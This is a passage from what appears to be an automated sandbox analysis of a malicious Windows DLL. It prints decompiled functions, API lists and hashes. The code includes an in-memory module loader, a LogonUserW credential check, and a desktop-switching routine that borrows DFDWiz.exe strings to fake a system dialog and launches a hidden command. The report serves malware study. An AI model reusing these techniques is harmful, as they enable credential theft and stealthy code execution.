							return CallWindowProcW(_t10, _t25, _t26, _t20, _a16);
						}
					}
				}
			}














                                                                                                                        0x6f337791
                                                                                                                        0x6f337796
                                                                                                                        0x6f33779b
                                                                                                                        0x6f33779f
                                                                                                                        0x6f3377a2
                                                                                                                        0x6f337835
                                                                                                                        0x00000000
                                                                                                                        0x6f337837
                                                                                                                        0x6f33783d
                                                                                                                        0x6f337876
                                                                                                                        0x6f33787b
                                                                                                                        0x00000000
                                                                                                                        0x6f33787d
                                                                                                                        0x6f33787d
                                                                                                                        0x6f337880
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337880
                                                                                                                        0x6f33783f
                                                                                                                        0x6f337845
                                                                                                                        0x00000000
                                                                                                                        0x6f337847
                                                                                                                        0x6f33785b
                                                                                                                        0x6f337867
                                                                                                                        0x00000000
                                                                                                                        0x6f337867
                                                                                                                        0x6f337845
                                                                                                                        0x6f33783d
                                                                                                                        0x6f3377a8
                                                                                                                        0x6f3377a8
                                                                                                                        0x6f33782a
                                                                                                                        0x00000000
                                                                                                                        0x6f3377aa
                                                                                                                        0x6f3377ad
                                                                                                                        0x6f33786e
                                                                                                                        0x6f337871
                                                                                                                        0x6f3377bc
                                                                                                                        0x6f3377bf
                                                                                                                        0x6f3377cc
                                                                                                                        0x6f3377d6
                                                                                                                        0x6f3377d8
                                                                                                                        0x6f3377e3
                                                                                                                        0x6f3377e9
                                                                                                                        0x6f3377fd
                                                                                                                        0x6f3377ff
                                                                                                                        0x6f337808
                                                                                                                        0x6f337808
                                                                                                                        0x6f33780d
                                                                                                                        0x6f337813
                                                                                                                        0x6f337813
                                                                                                                        0x6f33781b
                                                                                                                        0x6f33781b
                                                                                                                        0x6f337889
                                                                                                                        0x6f33788d
                                                                                                                        0x6f3378a0
                                                                                                                        0x6f3378a0
                                                                                                                        0x6f3377ad
                                                                                                                        0x6f3377a8

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageA.USER32 ref: 6F3377E3
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 6F3377F5
                                                                                                                        • NtTerminateThread.NTDLL ref: 6F337808
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F337813
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 6F33781B
                                                                                                                        • PostMessageA.USER32 ref: 6F33782A
                                                                                                                        • CreateThread.KERNEL32 ref: 6F337861
                                                                                                                        • CallWindowProcW.USER32(00000000,?,?,?,?), ref: 6F337897
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread$CallCloseCreateHandleObjectProcQuitSingleTerminateWaitWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1229868629-0
                                                                                                                        • Opcode ID: 824dcab9c096e68e035363804d759b246c01f09b7ba470af863497fe13b3871a
                                                                                                                        • Instruction ID: ca06e3b13392cbce3a3c6e23bb8c6b3b4d7e50a930f95373addd9bf49e26902b
                                                                                                                        • Opcode Fuzzy Hash: 824dcab9c096e68e035363804d759b246c01f09b7ba470af863497fe13b3871a
                                                                                                                        • Instruction Fuzzy Hash: 1021D873F483A5BBEB20EA588C4AF967A6CE796721F00052EF2519B2C0C775A814CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334E50, Relevance: 12.1, APIs: 8, Instructions: 63memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334E50(struct HINSTANCE__* _a4, WCHAR* _a8) {
				signed int _t20;
				struct HINSTANCE__* _t22;
				int _t23;
				struct HRSRC__* _t28;
				void* _t29;
				void* _t30;
				void* _t32;

				_t22 = _a4;
				_t30 = 0;
				_t28 = FindResourceW(_t22, _a8, 5);
				if(_t28 == 0) {
					return 0;
				} else {
					_t32 = LoadResource(_t22, _t28);
					if(_t32 != 0) {
						_t23 = SizeofResource(_t22, _t28);
						_t29 = LockResource(_t32);
						if(_t29 != 0) {
							_t30 = HeapAlloc(GetProcessHeap(), 8, _t23);
							RtlMoveMemory(_t30, _t29, _t23);
							_t20 =  *(_t30 + 0xc);
							if((_t20 & 0x40000000) == 0) {
								 *(_t30 + 8) =  *(_t30 + 8) & 0xfffbffff | 0x08000080;
							}
							 *(_t30 + 0xc) = _t20 & 0xefffffff;
							 *((intOrPtr*)(_t30 + 0x16)) = 0;
						}
						FreeResource(_t32);
					}
					return _t30;
				}
			}










                                                                                                                        0x6f334e55
                                                                                                                        0x6f334e5f
                                                                                                                        0x6f334e67
                                                                                                                        0x6f334e6b
                                                                                                                        0x6f334ee9
                                                                                                                        0x6f334e6d
                                                                                                                        0x6f334e76
                                                                                                                        0x6f334e7a
                                                                                                                        0x6f334e85
                                                                                                                        0x6f334e8d
                                                                                                                        0x6f334e91
                                                                                                                        0x6f334ea4
                                                                                                                        0x6f334ea8
                                                                                                                        0x6f334ead
                                                                                                                        0x6f334eb5
                                                                                                                        0x6f334ec6
                                                                                                                        0x6f334ec6
                                                                                                                        0x6f334ed0
                                                                                                                        0x6f334ed3
                                                                                                                        0x6f334ed3
                                                                                                                        0x6f334ed7
                                                                                                                        0x6f334ed7
                                                                                                                        0x6f334ee3
                                                                                                                        0x6f334ee3

                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(?,?,00000005), ref: 6F334E61
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 6F334E70
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 6F334E7E
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 6F334E87
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 6F334E96
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334E9D
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6F334EA8
                                                                                                                        • FreeResource.KERNEL32(00000000), ref: 6F334ED7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$Heap$AllocFindFreeLoadLockMemoryMoveProcessSizeof
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1815471765-0
                                                                                                                        • Opcode ID: f656d0bbd55f484103c88bf511f25de415d8a019537d68e7b4a1f8ba1e757561
                                                                                                                        • Instruction ID: 5552bbe0884fbf667e1d4cc689b403cf4a17fa970377ca752b7090be4ae3ed36
                                                                                                                        • Opcode Fuzzy Hash: f656d0bbd55f484103c88bf511f25de415d8a019537d68e7b4a1f8ba1e757561
                                                                                                                        • Instruction Fuzzy Hash: C211C673A00F59ABD320DBBACC48E67BBADFB86771F00851DF516C2250DA35D8108760
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3319F0, Relevance: 9.1, APIs: 6, Instructions: 143memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F3319F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				void* _v44;
				intOrPtr _v172;
				char _v356;
				long _v360;
				void* __edi;
				void* __esi;
				void* _t52;
				void* _t69;
				intOrPtr _t70;
				intOrPtr* _t83;
				signed int _t85;
				intOrPtr _t88;

				_t82 = _a4;
				_t69 = 0;
				if(_a4 != 0) {
					_t91 = _a8;
					_v44 = 0;
					_v24 = 0;
					_v16 = 0;
					_v20 = 0;
					_v4 = 0;
					_t88 = E6F331400( &_v356, _t82, _a8);
					if(_t88 != 0) {
						_t83 = _a16;
					} else {
						_t70 = _a12;
						_push( &_v356);
						_t88 = E6F3314E0(_t70);
						if(_t88 != 0) {
							_t83 = _a16;
						} else {
							_t88 = E6F3315C0( &_v356, _t82, _t91, _t70);
							if(_t88 != 0) {
								L18:
								_t83 = _a16;
								goto L19;
							} else {
								_t88 = E6F331660( &_v356);
								if(_t88 != 0) {
									goto L18;
								} else {
									_t88 = E6F331720( &_v356);
									if(_t88 != 0) {
										if(_v24 != 0) {
											_t85 = 0;
											if(_v20 > 0) {
												do {
													FreeLibrary( *(_v24 + _t85 * 4));
													_t85 = _t85 + 1;
												} while (_t85 < _v20);
											}
											HeapFree(GetProcessHeap(), 0, _v24);
										}
										goto L18;
									} else {
										_t88 = E6F3318D0( &_v356);
										if(_t88 != 0) {
											goto L18;
										} else {
											_t83 = _a16;
											if(_t83 != 0) {
												_v12 =  *((intOrPtr*)(_t83 + 0x2c));
												_v8 =  *((intOrPtr*)(_t83 + 0x30));
											}
											_t88 = E6F3319A0( &_v356, _t70);
											if(_t88 != 0) {
												L19:
												_push(0x8000);
												_push( &_v360);
												_push( &_v28);
												_push(0xffffffff);
												_v360 = 0;
												L6F33C2D6();
											} else {
												if(_t83 != 0) {
													 *((intOrPtr*)(_t83 + 0xc)) = _v32;
													 *((intOrPtr*)(_t83 + 0x10)) = _v28;
													 *((intOrPtr*)(_t83 + 0x14)) = _v4;
													 *((intOrPtr*)(_t83 + 4)) = 0x3c;
													 *((intOrPtr*)(_t83 + 8)) = _t70;
													 *((intOrPtr*)(_t83 + 0x18)) = _v172;
													 *(_t83 + 0x1c) = _v24;
													 *((intOrPtr*)(_t83 + 0x20)) = _v20;
												}
											}
										}
									}
								}
							}
						}
						_t52 = _v44;
						if(_t52 != 0) {
							HeapFree(GetProcessHeap(), 0, _t52);
						}
						_t69 = 0;
					}
					if(_t83 != _t69) {
						 *_t83 = _t88;
					}
					return _t88;
				} else {
					_t2 = _t69 - 2; // -2
					return _t2;
				}
			}























                                                                                                                        0x6f3319f8
                                                                                                                        0x6f3319ff
                                                                                                                        0x6f331a03
                                                                                                                        0x6f331a12
                                                                                                                        0x6f331a20
                                                                                                                        0x6f331a27
                                                                                                                        0x6f331a2e
                                                                                                                        0x6f331a35
                                                                                                                        0x6f331a3c
                                                                                                                        0x6f331a48
                                                                                                                        0x6f331a4f
                                                                                                                        0x6f331be0
                                                                                                                        0x6f331a55
                                                                                                                        0x6f331a55
                                                                                                                        0x6f331a60
                                                                                                                        0x6f331a68
                                                                                                                        0x6f331a6f
                                                                                                                        0x6f331bba
                                                                                                                        0x6f331a75
                                                                                                                        0x6f331a81
                                                                                                                        0x6f331a88
                                                                                                                        0x6f331b90
                                                                                                                        0x6f331b90
                                                                                                                        0x00000000
                                                                                                                        0x6f331a8e
                                                                                                                        0x6f331a96
                                                                                                                        0x6f331a9d
                                                                                                                        0x00000000
                                                                                                                        0x6f331aa3
                                                                                                                        0x6f331aa8
                                                                                                                        0x6f331aac
                                                                                                                        0x6f331b4f
                                                                                                                        0x6f331b51
                                                                                                                        0x6f331b5a
                                                                                                                        0x6f331b62
                                                                                                                        0x6f331b6d
                                                                                                                        0x6f331b6f
                                                                                                                        0x6f331b70
                                                                                                                        0x6f331b62
                                                                                                                        0x6f331b8a
                                                                                                                        0x6f331b8a
                                                                                                                        0x00000000
                                                                                                                        0x6f331ab2
                                                                                                                        0x6f331ab7
                                                                                                                        0x6f331abb
                                                                                                                        0x00000000
                                                                                                                        0x6f331ac1
                                                                                                                        0x6f331ac1
                                                                                                                        0x6f331aca
                                                                                                                        0x6f331ad2
                                                                                                                        0x6f331ad9
                                                                                                                        0x6f331ad9
                                                                                                                        0x6f331aea
                                                                                                                        0x6f331af1
                                                                                                                        0x6f331b97
                                                                                                                        0x6f331b97
                                                                                                                        0x6f331ba0
                                                                                                                        0x6f331ba8
                                                                                                                        0x6f331ba9
                                                                                                                        0x6f331bab
                                                                                                                        0x6f331bb3
                                                                                                                        0x6f331af7
                                                                                                                        0x6f331af9
                                                                                                                        0x6f331b14
                                                                                                                        0x6f331b1e
                                                                                                                        0x6f331b28
                                                                                                                        0x6f331b32
                                                                                                                        0x6f331b39
                                                                                                                        0x6f331b3c
                                                                                                                        0x6f331b3f
                                                                                                                        0x6f331b42
                                                                                                                        0x6f331b42
                                                                                                                        0x6f331af9
                                                                                                                        0x6f331af1
                                                                                                                        0x6f331abb
                                                                                                                        0x6f331aac
                                                                                                                        0x6f331a9d
                                                                                                                        0x6f331a88
                                                                                                                        0x6f331bc1
                                                                                                                        0x6f331bca
                                                                                                                        0x6f331bd6
                                                                                                                        0x6f331bd6
                                                                                                                        0x6f331bdc
                                                                                                                        0x6f331bdc
                                                                                                                        0x6f331be9
                                                                                                                        0x6f331beb
                                                                                                                        0x6f331beb
                                                                                                                        0x6f331bf9
                                                                                                                        0x6f331a06
                                                                                                                        0x6f331a06
                                                                                                                        0x6f331a10
                                                                                                                        0x6f331a10

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F331BCF
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331BD6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 047380f890eb2922787d5ec1697360bffd52bdff47e78a173ec9d8d4179a37bf
                                                                                                                        • Instruction ID: 9fb6415a86b195740a8fd1d14fe53390594b20f304f46608c5d4b538d76cb9c6
                                                                                                                        • Opcode Fuzzy Hash: 047380f890eb2922787d5ec1697360bffd52bdff47e78a173ec9d8d4179a37bf
                                                                                                                        • Instruction Fuzzy Hash: A6513E76D087A59BC330EF54D880ADBB7E9BF88354F014A2DDC8897340E736A845CB92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F331C00, Relevance: 6.1, APIs: 4, Instructions: 69memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 57%
                                                                                                                        			E6F331C00(intOrPtr _a4) {
				long _v4;
				intOrPtr* _t24;
				intOrPtr _t30;
				signed int _t37;
				intOrPtr _t39;
				void* _t40;

				_t39 = _a4;
				_t40 = 1;
				if(_t39 == 0 ||  *((intOrPtr*)(_t39 + 4)) != 0x3c ||  *((intOrPtr*)(_t39 + 0xc)) == 0) {
					L14:
					return 0;
				} else {
					_t30 = _t39 + 0x10;
					_a4 = _t30;
					if( *((intOrPtr*)(_t39 + 0x10)) == 0) {
						goto L14;
					} else {
						if( *(_t39 + 0x1c) != 0) {
							_t37 = 0;
							if( *((intOrPtr*)(_t39 + 0x20)) > 0) {
								do {
									FreeLibrary( *( *(_t39 + 0x1c) + _t37 * 4));
									_t37 = _t37 + 1;
								} while (_t37 <  *((intOrPtr*)(_t39 + 0x20)));
								_t30 = _a4;
							}
							HeapFree(GetProcessHeap(), 0,  *(_t39 + 0x1c));
						}
						if(( *(_t39 + 8) & 0x00000001) == 0) {
							_t24 =  *((intOrPtr*)(_t39 + 0x14));
							if(_t24 != 0) {
								_t40 =  *_t24( *((intOrPtr*)(_t39 + 0xc)), 0, 0);
							}
						}
						_push(0x8000);
						_push( &_v4);
						_push(_t30);
						_push(0xffffffff);
						_v4 = 0;
						L6F33C2D6();
						return _t40;
					}
				}
			}









                                                                                                                        0x6f331c04
                                                                                                                        0x6f331c08
                                                                                                                        0x6f331c0f
                                                                                                                        0x6f331cb3
                                                                                                                        0x6f331cb7
                                                                                                                        0x6f331c29
                                                                                                                        0x6f331c2d
                                                                                                                        0x6f331c30
                                                                                                                        0x6f331c34
                                                                                                                        0x00000000
                                                                                                                        0x6f331c36
                                                                                                                        0x6f331c3a
                                                                                                                        0x6f331c3d
                                                                                                                        0x6f331c42
                                                                                                                        0x6f331c50
                                                                                                                        0x6f331c57
                                                                                                                        0x6f331c59
                                                                                                                        0x6f331c5a
                                                                                                                        0x6f331c5f
                                                                                                                        0x6f331c5f
                                                                                                                        0x6f331c70
                                                                                                                        0x6f331c76
                                                                                                                        0x6f331c7b
                                                                                                                        0x6f331c7d
                                                                                                                        0x6f331c82
                                                                                                                        0x6f331c8e
                                                                                                                        0x6f331c8e
                                                                                                                        0x6f331c82
                                                                                                                        0x6f331c90
                                                                                                                        0x6f331c99
                                                                                                                        0x6f331c9a
                                                                                                                        0x6f331c9b
                                                                                                                        0x6f331c9d
                                                                                                                        0x6f331ca5
                                                                                                                        0x6f331cb0
                                                                                                                        0x6f331cb0
                                                                                                                        0x6f331c34

                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32 ref: 6F331C57
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F331C69
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331C70
                                                                                                                        • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 6F331CA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$Heap$LibraryMemoryProcessVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020761401-0
                                                                                                                        • Opcode ID: 83e483c244fc649ca1f84219ff7223492add98395c5c5aace1c3365aea7dac1e
                                                                                                                        • Instruction ID: 8eb1d78d45fe5ace4bb96cd64242e8b3ef3c4ae36b17bb0efb469e661d709d61
                                                                                                                        • Opcode Fuzzy Hash: 83e483c244fc649ca1f84219ff7223492add98395c5c5aace1c3365aea7dac1e
                                                                                                                        • Instruction Fuzzy Hash: C221A2729447549FE730DF50D880B63B3E8FB88765F108A1EE49686680C771F848CB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335130, Relevance: 4.5, APIs: 3, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F335130(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12) {
				void* _v4;
				long _t16;
				int _t17;

				_t16 = 0;
				_v4 = 0;
				_t17 = LogonUserW(_a4, _a8, _a12, 2, 0,  &_v4);
				if(_t17 != 0 || GetLastError() == 0x52f) {
					_t16 = 1;
					if(_t17 != 0) {
						CloseHandle(_v4);
					}
				}
				return _t16;
			}






                                                                                                                        0x6f335144
                                                                                                                        0x6f33514c
                                                                                                                        0x6f335156
                                                                                                                        0x6f33515a
                                                                                                                        0x6f335169
                                                                                                                        0x6f335170
                                                                                                                        0x6f335177
                                                                                                                        0x6f335177
                                                                                                                        0x6f335170
                                                                                                                        0x6f335182

                                                                                                                        APIs
                                                                                                                        • LogonUserW.ADVAPI32(0099B7A8,0099B7A8,6F3396ED,00000002,00000000,0099EC68), ref: 6F335150
                                                                                                                        • GetLastError.KERNEL32 ref: 6F33515C
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F335177
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseErrorHandleLastLogonUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 917161313-0
                                                                                                                        • Opcode ID: 8a47160a5473e4dc22dc13973ab03e83e6c9ed8132db67aae0c621e5db2a02ed
                                                                                                                        • Instruction ID: 93d0e1f3ba18ab7827a6688f8410f9a1ac13c497870c77d73e373aaf97c4f76c
                                                                                                                        • Opcode Fuzzy Hash: 8a47160a5473e4dc22dc13973ab03e83e6c9ed8132db67aae0c621e5db2a02ed
                                                                                                                        • Instruction Fuzzy Hash: B5F05EB7E056516BD620CB19D848E5B77BAEBC9761F01491CF955C7240C730D8008772
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F339D10, Relevance: 86.1, APIs: 43, Strings: 6, Instructions: 310memorywindowsleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 87%
                                                                                                                        			E6F339D10() {
				intOrPtr _v32;
				char _v264;
				char _v272;
				void* _v284;
				WCHAR* _v288;
				void* _v292;
				WCHAR* _v296;
				WCHAR* _v300;
				char _v324;
				char* _v328;
				intOrPtr _v332;
				WCHAR* _v340;
				void* _v344;
				void* _v348;
				void* _v356;
				void* _v360;
				void* _v364;
				void* _v368;
				intOrPtr _v372;
				long _v376;
				WCHAR* _v380;
				char _v384;
				void* _v388;
				void* _v392;
				void* _v396;
				char _v400;
				struct HINSTANCE__* _v404;
				void* _v408;
				short _v412;
				short _v416;
				char _v420;
				struct HDESK__* _t62;
				struct HDESK__* _t66;
				CHAR* _t72;
				WCHAR* _t114;
				void* _t118;
				WCHAR* _t119;
				WCHAR* _t120;
				struct HDESK__* _t121;
				struct HDESK__* _t122;
				char _t130;
				struct HINSTANCE__* _t136;
				void* _t139;
				void* _t141;
				struct HINSTANCE__* _t142;
				WCHAR* _t143;
				WCHAR* _t144;
				WCHAR* _t145;
				WCHAR* _t146;
				WCHAR* _t147;
				WCHAR* _t148;
				WCHAR* _t151;
				short* _t153;
				short* _t154;
				short* _t155;

				_t62 =  *0x6f340480; // 0x0
				SwitchDesktop(_t62);
				_t121 =  *0x6f340480; // 0x0
				SetThreadDesktop(_t121);
				__imp__CoInitializeEx(0, 6);
				_t142 = LoadLibraryA("comctl32.dll");
				_v404 = _t142;
				if(_t142 != 0) {
					_push(0xff000000);
					_push(1);
					_push( &_v400);
					_push(_t142);
					_v400 = 0xc590294f;
					_v396 = 0;
					_v392 = 0;
					_v388 = 0;
					E6F331DB0();
					_t153 =  &(( &_v412)[8]);
					if(_v388 != 0) {
						_t72 = GetCommandLineA();
						_v420 = 0;
						_t139 = E6F33A3D0(_t72,  &_v420);
						_t154 =  &(_t153[4]);
						_v416 = _t139;
						if(_t139 != 0) {
							if(_v420 > 3) {
								_t130 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
								wsprintfA( &_v272, "%s%s", _t130, "DFDWiz.exe");
								_t155 =  &(_t154[8]);
								_t136 = LoadLibraryExA( &_v264, 0, 0x20);
								if(_t136 != 0) {
									_t141 = HeapAlloc(GetProcessHeap(), 8, 0x1770);
									if(_t141 != 0) {
										_t23 = _t141 + 0x190; // 0x190
										_t143 = _t23;
										if(LoadStringW(_t136, 0x79, _t143, 0xc8) > 0) {
											_v340 = _t143;
										}
										_t25 = _t141 + 0x320; // 0x320
										_t144 = _t25;
										if(LoadStringW(_t136, 0x7c, _t144, 0x3e8) > 0) {
											_t114 = StrChrW(_t144, 0xa);
											if(_t114 != 0) {
												_v340 =  &(_t114[1]);
											}
										}
										_t27 = _t141 + 0xaf0; // 0xaf0
										_t145 = _t27;
										if(FormatMessageW(0xaff, _t136, 0x50000001, 0, _t145, 0x64, 0) != 0) {
											_v288 = _t145;
										}
										_t29 = _t141 + 0xbb8; // 0xbb8
										_t146 = _t29;
										if(LoadStringW(_t136, 0x1b0, _t146, 0x64) > 0) {
											_t30 = _t141 + 0xc80; // 0xc80
											if(LoadStringW(_t136, 0xf6, _t30, 0x64) > 0) {
												_t31 = _t141 + 0xc80; // 0xc80
												_v372 = _t31;
												_v384 = 1;
												_v380 = _t146;
												_v376 = 8;
												_v332 = 2;
												_v324 = 1;
												_v328 =  &_v384;
											}
										}
										_t40 = _t141 + 0xd48; // 0xd48
										_t147 = _t40;
										if(LoadStringW(_t136, 0x7e, _t147, 0x64) > 0) {
											_v296 = _t147;
										}
										_t42 = _t141 + 0xe10; // 0xe10
										_t148 = _t42;
										if(LoadStringW(_t136, 0x7f, _t148, 0x64) > 0) {
											_v300 = _t148;
										}
										_t44 = _t141 + 0xed8; // 0xed8
										if(LoadStringW(_t136, 0x81, _t44, 0xc8) > 0) {
											PathBuildRootW( &_v412, PathGetDriveNumberA( &_v272));
											_t47 = _t141 + 0x1068; // 0x1068
											_t120 = _t47;
											GetVolumeInformationW( &_v416, _t120, 0x64, 0, 0, 0, 0, 0);
											_v412 = 0;
											_t50 = _t141 + 0x1130; // 0x1130
											_t151 = _t50;
											if( *_t120 == 0) {
												_t120 = L"<n/a>";
											}
											_t52 = _t141 + 0xed8; // 0xed8
											wsprintfW(_t151, _t52,  &_v416, _t120);
											_t155 =  &(_t155[8]);
											_v300 = _t151;
										}
										_t118 = HeapAlloc(GetProcessHeap(), 0, 0x105);
										if(_t118 != 0) {
											wsprintfA(_t118, "/c start /b \"\" \"%s\" f w %d",  *((intOrPtr*)(_v416 + 0xc)), 5);
											E6F339C50(0, 0x83f2, _t118);
											_v400( &_v380, 0, 0, 0, 0, 0);
											HeapFree(GetProcessHeap(), 0, _t118);
											if(_v32 != 0) {
												Sleep(0x1f4);
												E6F3396D0(0);
											}
											Sleep(0x1f4);
										}
										if(FormatMessageW(0xaff, _t136, 0xb0000002, 0, _t141, 0x1f4, 0) != 0) {
											_t59 = _t141 + 0x3e8; // 0x3e8
											_t119 = _t59;
											if(FormatMessageW(0xaff, _t136, 0x50000004, 0, _t119, 0x64, 0) != 0) {
												MessageBoxW(0, _t141, _t119, 0x40);
												Sleep(0x1f4);
											}
										}
										HeapFree(GetProcessHeap(), 0, _t141);
										_t142 = _v404;
									}
									FreeLibrary(_t136);
									_t139 = _v408;
								}
							}
							LocalFree(_t139);
						}
					}
					FreeLibrary(_t142);
				}
				__imp__CoUninitialize();
				_t66 =  *0x6f340484; // 0x0
				SwitchDesktop(_t66);
				_t122 =  *0x6f340484; // 0x0
				SetThreadDesktop(_t122);
				return 0;
			}


























































                                                                                                                        0x6f339d16
                                                                                                                        0x6f339d1e
                                                                                                                        0x6f339d24
                                                                                                                        0x6f339d2b
                                                                                                                        0x6f339d36
                                                                                                                        0x6f339d47
                                                                                                                        0x6f339d49
                                                                                                                        0x6f339d4f
                                                                                                                        0x6f339d55
                                                                                                                        0x6f339d5a
                                                                                                                        0x6f339d60
                                                                                                                        0x6f339d61
                                                                                                                        0x6f339d62
                                                                                                                        0x6f339d6a
                                                                                                                        0x6f339d6e
                                                                                                                        0x6f339d72
                                                                                                                        0x6f339d76
                                                                                                                        0x6f339d7b
                                                                                                                        0x6f339d82
                                                                                                                        0x6f339d89
                                                                                                                        0x6f339d95
                                                                                                                        0x6f339d9e
                                                                                                                        0x6f339da0
